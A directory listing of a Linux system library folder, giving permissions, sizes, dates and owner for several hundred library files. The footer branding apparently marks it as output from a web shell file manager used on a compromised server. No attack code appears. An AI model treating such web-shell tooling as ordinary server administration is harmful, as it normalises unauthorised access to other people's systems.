0644
libpci.so.3
79.148 KB
April 09 2024 12:15:21
root
0644
libpci.so.3.10.0
79.148 KB
April 09 2024 12:15:21
root
0644
libpcprofile.so
14.203 KB
September 17 2025 10:55:42
root
0644
libpcre.so.3
474.359 KB
June 20 2023 2:30:29
root
0644
libpcre.so.3.13.3
474.359 KB
June 20 2023 2:30:29
root
0644
libpcre2-16.a
717.025 KB
October 02 2024 8:40:51
root
0644
libpcre2-16.so
558.656 KB
October 02 2024 8:40:51
root
0644
libpcre2-16.so.0
558.656 KB
October 02 2024 8:40:51
root
0644
libpcre2-16.so.0.11.2
558.656 KB
October 02 2024 8:40:51
root
0644
libpcre2-32.a
691.023 KB
October 02 2024 8:40:51
root
0644
libpcre2-32.so
530.656 KB
October 02 2024 8:40:51
root
0644
libpcre2-32.so.0
530.656 KB
October 02 2024 8:40:51
root
0644
libpcre2-32.so.0.11.2
530.656 KB
October 02 2024 8:40:51
root
0644
libpcre2-8.a
773.063 KB
October 02 2024 8:40:51
root
0644
libpcre2-8.so
610.688 KB
October 02 2024 8:40:51
root
0644
libpcre2-8.so.0
610.688 KB
October 02 2024 8:40:51
root
0644
libpcre2-8.so.0.11.2
610.688 KB
October 02 2024 8:40:51
root
0644
libpcre2-posix.a
5.658 KB
October 02 2024 8:40:51
root
0644
libpcre2-posix.so
14.227 KB
October 02 2024 8:40:51
root
0644
libpcre2-posix.so.3
14.227 KB
October 02 2024 8:40:51
root
0644
libpcre2-posix.so.3.0.4
14.227 KB
October 02 2024 8:40:51
root
0644
libpcreposix.so.3
14.234 KB
June 20 2023 2:30:29
root
0644
libpcreposix.so.3.13.3
14.234 KB
June 20 2023 2:30:29
root
0644
libperl.so.5.34
3.51 MB
July 26 2025 1:26:40
root
0644
libperl.so.5.34.0
3.51 MB
July 26 2025 1:26:40
root
0644
libperl.so.5.38
3.68 MB
July 26 2025 1:26:40
root
0644
libperl.so.5.38.2
3.68 MB
July 26 2025 1:26:40
root
0644
libpipeline.so.1
46 KB
March 30 2024 3:26:54
root
0644
libpipeline.so.1.5.7
46 KB
March 30 2024 3:26:54
root
0644
libpkgconf.so.3
67.438 KB
April 09 2024 12:15:39
root
0644
libpkgconf.so.3.0.0
67.438 KB
April 09 2024 12:15:39
root
0644
libply-boot-client.so.5
30.508 KB
February 25 2025 1:47:08
root
0644
libply-boot-client.so.5.0.0
30.508 KB
February 25 2025 1:47:08
root
0644
libply-splash-core.so.5
196.18 KB
February 25 2025 1:47:08
root
0644
libply-splash-core.so.5.0.0
196.18 KB
February 25 2025 1:47:08
root
0644
libply-splash-graphics.so.5
79.117 KB
February 25 2025 1:47:08
root
0644
libply-splash-graphics.so.5.0.0
79.117 KB
February 25 2025 1:47:08
root
0644
libply.so.5
110.891 KB
February 25 2025 1:47:08
root
0644
libply.so.5.0.0
110.891 KB
February 25 2025 1:47:08
root
0644
libpng16.so.16
218.07 KB
December 09 2025 8:06:48
root
0644
libpng16.so.16.43.0
218.07 KB
December 09 2025 8:06:48
root
0644
libpolkit-agent-1.so.0
50.07 KB
December 02 2024 7:59:52
root
0644
libpolkit-agent-1.so.0.0.0
50.07 KB
December 02 2024 7:59:52
root
0644
libpolkit-gobject-1.so.0
122.07 KB
December 02 2024 7:59:52
root
0644
libpolkit-gobject-1.so.0.0.0
122.07 KB
December 02 2024 7:59:52
root
0644
libpopt.so.0
54.625 KB
April 09 2024 12:15:55
root
0644
libpopt.so.0.0.2
54.625 KB
April 09 2024 12:15:55
root
0644
libproc2.so.0
198.633 KB
September 26 2024 4:44:05
root
0644
libproc2.so.0.0.2
198.633 KB
September 26 2024 4:44:05
root
0644
libprocps.so.8
78.203 KB
October 31 2023 7:36:04
root
0644
libprocps.so.8.0.3
78.203 KB
October 31 2023 7:36:04
root
0644
libprotobuf-lite.so.23
699.07 KB
July 05 2025 12:02:11
root
0644
libprotobuf-lite.so.23.0.4
699.07 KB
July 05 2025 12:02:11
root
0644
libprotobuf-lite.so.32
831.039 KB
July 04 2025 10:52:30
root
0644
libprotobuf-lite.so.32.0.12
831.039 KB
July 04 2025 10:52:30
root
0644
libpsl.so.5
73.992 KB
March 31 2024 3:56:25
root
0644
libpsl.so.5.3.4
73.992 KB
March 31 2024 3:56:25
root
0644
libpsx.so.2
22.211 KB
February 20 2025 11:49:57
root
0644
libpsx.so.2.66
22.211 KB
February 20 2025 11:49:57
root
0644
libpthread.a
0.008 KB
September 17 2025 10:55:42
root
0644
libpthread.so.0
14.07 KB
September 17 2025 10:55:42
root
0644
libpthread_nonshared.a
0.008 KB
September 17 2025 10:55:42
root
0644
libpython3.10.so.1
5.56 MB
November 04 2025 4:48:33
root
0644
libpython3.10.so.1.0
5.56 MB
November 04 2025 4:48:33
root
0644
libpython3.12.so.1
8.64 MB
November 06 2025 9:44:16
root
0644
libpython3.12.so.1.0
8.64 MB
November 06 2025 9:44:16
root
0644
libquadmath.so.0
286.852 KB
September 09 2024 9:21:53
root
0644
libquadmath.so.0.0.0
286.852 KB
September 09 2024 9:21:53
root
0644
librav1e.so.0
3.13 MB
February 17 2024 3:23:49
root
0644
librav1e.so.0.7.1
3.13 MB
February 17 2024 3:23:49
root
0644
libraw.so.23
1.1 MB
April 28 2025 12:02:15
root
0644
libraw.so.23.0.0
1.1 MB
April 28 2025 12:02:15
root
0644
libraw_r.so.23
1.1 MB
April 28 2025 12:02:15
root
0644
libraw_r.so.23.0.0
1.1 MB
April 28 2025 12:02:15
root
0644
libreadline.so.8
336.031 KB
March 31 2024 4:21:18
root
0644
libreadline.so.8.2
336.031 KB
March 31 2024 4:21:18
root
0644
libresolv.a
86.035 KB
September 17 2025 10:55:42
root
0644
libresolv.so
66.508 KB
September 17 2025 10:55:42
root
0644
libresolv.so.2
66.508 KB
September 17 2025 10:55:42
root
0644
librt.a
0.008 KB
September 17 2025 10:55:42
root
0644
librt.so.1
14.281 KB
September 17 2025 10:55:42
root
0644
librtmp.so.1
118.992 KB
March 31 2024 4:21:45
root
0644
libsasl2.so.2
98.828 KB
August 09 2024 10:33:21
root
0644
libsasl2.so.2.0.25
98.828 KB
August 09 2024 10:33:21
root
0644
libseccomp.so.2
122.422 KB
August 09 2024 10:33:21
root
0644
libseccomp.so.2.5.5
122.422 KB
August 09 2024 10:33:21
root
0644
libselinux.so.1
170.383 KB
October 02 2024 8:40:52
root
0644
libsemanage.so.2
256.141 KB
March 31 2024 10:16:21
root
0644
libsensors.so.5
58.516 KB
March 31 2024 10:31:19
root
0644
libsensors.so.5.0.0
58.516 KB
March 31 2024 10:31:19
root
0644
libsepol.so.2
722.422 KB
April 09 2024 12:07:01
root
0644
libsframe.so.1
34.344 KB
December 03 2025 11:01:20
root
0644
libsframe.so.1.0.0
34.344 KB
December 03 2025 11:01:20
root
0644
libsharpyuv.so.0
22.141 KB
March 31 2024 4:02:02
root
0644
libsharpyuv.so.0.0.1
22.141 KB
March 31 2024 4:02:02
root
0644
libsigsegv.so.2
18.219 KB
April 09 2024 12:07:17
root
0644
libsigsegv.so.2.0.7
18.219 KB
April 09 2024 12:07:17
root
0644
libslang.so.2
2.06 MB
March 31 2024 4:22:56
root
0644
libslang.so.2.3.3
2.06 MB
March 31 2024 4:22:56
root
0644
libsmartcols.so.1
110.148 KB
June 05 2025 8:17:38
root
0644
libsmartcols.so.1.1.0
110.148 KB
June 05 2025 8:17:38
root
0644
libsodium.so.23
346.719 KB
April 09 2024 12:07:25
root
0644
libsodium.so.23.3.0
346.719 KB
April 09 2024 12:07:25
root
0644
libsqlite3.so.0
1.4 MB
September 12 2025 2:06:42
root
0644
libsqlite3.so.0.8.6
1.4 MB
September 12 2025 2:06:42
root
0644
libss.so.2
30.078 KB
April 29 2024 7:44:46
root
0644
libss.so.2.0
30.078 KB
April 29 2024 7:44:46
root
0644
libssh.so.4
447.523 KB
October 29 2025 8:58:24
root
0644
libssh.so.4.9.6
447.523 KB
October 29 2025 8:58:24
root
0644
libssl.a
1.18 MB
September 18 2025 7:12:48
root
0644
libssl.so
680.188 KB
September 18 2025 7:12:48
root
0644
libssl.so.3
680.188 KB
September 18 2025 7:12:48
root
0644
libstdc++.so.6
2.47 MB
September 09 2024 9:21:53
root
0644
libstdc++.so.6.0.33
2.47 MB
September 09 2024 9:21:53
root
0644
libstemmer.so.0d
810.461 KB
April 09 2024 12:19:41
root
0644
libstemmer.so.0d.0.0
810.461 KB
April 09 2024 12:19:41
root
0644
libsystemd.so.0
889.25 KB
July 12 2025 2:52:59
root
0644
libsystemd.so.0.38.0
889.25 KB
July 12 2025 2:52:59
root
0644
libtasn1.so.6
86.148 KB
February 12 2025 4:19:02
root
0644
libtasn1.so.6.6.3
86.148 KB
February 12 2025 4:19:02
root
0644
libthread_db.so
46.789 KB
September 17 2025 10:55:42
root
0644
libthread_db.so.1
46.789 KB
September 17 2025 10:55:42
root
0644
libtic.so.6
74.305 KB
April 09 2024 12:14:03
root
0644
libtic.so.6.4
74.305 KB
April 09 2024 12:14:03
root
0644
libtiff.so.5
542.164 KB
September 25 2025 2:29:49
root
0644
libtiff.so.5.7.0
542.164 KB
September 25 2025 2:29:49
root
0644
libtiff.so.6
562.164 KB
September 25 2025 1:56:31
root
0644
libtiff.so.6.0.1
562.164 KB
September 25 2025 1:56:31
root
0644
libtinfo.so.6
203.445 KB
April 09 2024 12:14:03
root
0644
libtinfo.so.6.4
203.445 KB
April 09 2024 12:14:03
root
0644
libtirpc.a
398.25 KB
March 31 2024 10:18:35
root
0644
libtirpc.so
174.625 KB
March 31 2024 10:18:35
root
0644
libtirpc.so.3
174.625 KB
March 31 2024 10:18:35
root
0644
libtirpc.so.3.0.0
174.625 KB
March 31 2024 10:18:35
root
0644
libtraceevent.so.1
158.883 KB
March 07 2025 9:17:32
root
0644
libtraceevent.so.1.8.2
158.883 KB
March 07 2025 9:17:32
root
0644
libtracefs.so.1
147.523 KB
April 17 2024 4:25:06
root
0644
libtracefs.so.1.8.0
147.523 KB
April 17 2024 4:25:06
root
0644
libtsan.so.0
7 MB
July 20 2024 2:07:32
root
0644
libtsan.so.0.0.0
7 MB
July 20 2024 2:07:32
root
0644
libtsan.so.2
8.56 MB
September 09 2024 9:21:53
root
0644
libtsan.so.2.0.0
8.56 MB
September 09 2024 9:21:53
root
0644
libubsan.so.1
3.27 MB
September 09 2024 9:21:53
root
0644
libubsan.so.1.0.0
3.27 MB
September 09 2024 9:21:53
root
0644
libuchardet.so.0
190.156 KB
April 09 2024 12:21:19
root
0644
libuchardet.so.0.0.8
190.156 KB
April 09 2024 12:21:19
root
0644
libudev.so.1
202.43 KB
July 12 2025 2:52:59
root
0644
libudev.so.1.7.8
202.43 KB
July 12 2025 2:52:59
root
0644
libulockmgr.so.1
18.219 KB
March 31 2024 1:27:22
root
0644
libulockmgr.so.1.0.1
18.219 KB
March 31 2024 1:27:22
root
0644
libunistring.so.2
1.66 MB
January 09 2022 1:08:42
root
0644
libunistring.so.2.2.0
1.66 MB
January 09 2022 1:08:42
root
0644
libunistring.so.5
1.67 MB
October 02 2024 8:40:50
root
0644
libunistring.so.5.0.0
1.67 MB
October 02 2024 8:40:50
root
0644
libunwind-coredump.so.0
17.703 KB
October 02 2024 8:40:51
root
0644
libunwind-coredump.so.0.0.0
17.703 KB
October 02 2024 8:40:51
root
0644
libunwind-ptrace.so.0
18.219 KB
October 02 2024 8:40:51
root
0644
libunwind-ptrace.so.0.0.0
18.219 KB
October 02 2024 8:40:51
root
0644
libunwind-x86_64.so.8
66.086 KB
October 02 2024 8:40:51
root
0644
libunwind-x86_64.so.8.0.1
66.086 KB
October 02 2024 8:40:51
root
0644
libunwind.so.8
62.281 KB
October 02 2024 8:40:51
root
0644
libunwind.so.8.0.1
62.281 KB
October 02 2024 8:40:51
root
0644
libusb-1.0.so.0
114.977 KB
February 02 2024 2:42:35
root
0644
libusb-1.0.so.0.4.0
114.977 KB
February 02 2024 2:42:35
root
0644
libutil.a
0.008 KB
September 17 2025 10:55:42
root
0644
libutil.so.1
14.07 KB
September 17 2025 10:55:42
root
0644
libuuid.so.1
34.211 KB
June 05 2025 8:17:38
root
0644
libuuid.so.1.3.0
34.211 KB
June 05 2025 8:17:38
root
0644
libuv.so.1
206.086 KB
March 31 2024 4:01:40
root
0644
libuv.so.1.0.0
206.086 KB
March 31 2024 4:01:40
root
0644
libwebp.so.7
482.555 KB
March 31 2024 4:02:02
root
0644
libwebp.so.7.1.8
482.555 KB
March 31 2024 4:02:02
root
0644
libwebpdemux.so.2
22.211 KB
March 31 2024 4:02:02
root
0644
libwebpdemux.so.2.0.14
22.211 KB
March 31 2024 4:02:02
root
0644
libwebpmux.so.3
50.313 KB
March 31 2024 4:02:02
root
0644
libwebpmux.so.3.0.13
50.313 KB
March 31 2024 4:02:02
root
0644
libwrap.so.0
43.031 KB
April 05 2024 9:22:50
root
0644
libwrap.so.0.7.6
43.031 KB
April 05 2024 9:22:50
root
0644
libx265.so.199
15.55 MB
April 19 2024 1:47:47
root
0644
libxcb.so.1
158.586 KB
April 18 2024 10:21:22
root
0644
libxcb.so.1.1.0
158.586 KB
April 18 2024 10:21:22
root
0644
libxkbcommon.so.0
286.555 KB
April 09 2024 12:09:59
root
0644
libxkbcommon.so.0.0.0
286.555 KB
April 09 2024 12:09:59
root
0644
libxml2.so.2
1.88 MB
October 30 2025 9:26:06
root
0644
libxml2.so.2.9.14
1.88 MB
October 30 2025 9:26:06
root
0644
libxmlb.so.2
166.07 KB
April 10 2024 4:52:31
root
0644
libxmlb.so.2.0.0
166.07 KB
April 10 2024 4:52:31
root
0644
libxmlrpc-epi.so.0
74.828 KB
April 01 2024 12:48:35
root
0644
libxmlrpc-epi.so.0.0.3
74.828 KB
April 01 2024 12:48:35
root
0644
libxslt.so.1
254.43 KB
March 20 2025 12:53:59
root
0644
libxslt.so.1.1.39
254.43 KB
March 20 2025 12:53:59
root
0644
libxtables.so.12
66.07 KB
April 08 2024 11:59:59
root
0644
libxtables.so.12.7.0
66.07 KB
April 08 2024 11:59:59
root
0644
libxxhash.so.0
70.07 KB
April 09 2024 12:23:58
root
0644
libxxhash.so.0.8.2
70.07 KB
April 09 2024 12:23:58
root
0644
libyaml-0.so.2
125.992 KB
April 09 2024 12:10:47
root
0644
libyaml-0.so.2.0.9
125.992 KB
April 09 2024 12:10:47
root
0644
libyuv.so.0
606.078 KB
January 16 2024 8:12:33
root
0644
libyuv.so.0.0.1883
606.078 KB
January 16 2024 8:12:33
root
0644
libz.so.1
110.352 KB
August 09 2024 10:33:20
root
0644
libz.so.1.3
110.352 KB
August 09 2024 10:33:20
root
0644
libzip.so.4
111.672 KB
March 31 2024 4:03:10
root
0644
libzip.so.4.0
111.672 KB
March 31 2024 4:03:10
root
0644
libzstd.so.1
738.148 KB
August 09 2024 10:33:22
root
0644
libzstd.so.1.5.5
738.148 KB
August 09 2024 10:33:22
root
0644
preloadable_libintl.so
46.523 KB
April 08 2024 11:58:30
root
0644
rcrt1.o
1.617 KB
September 17 2025 10:55:42
root
0644
2017 © MaVieta | D704T team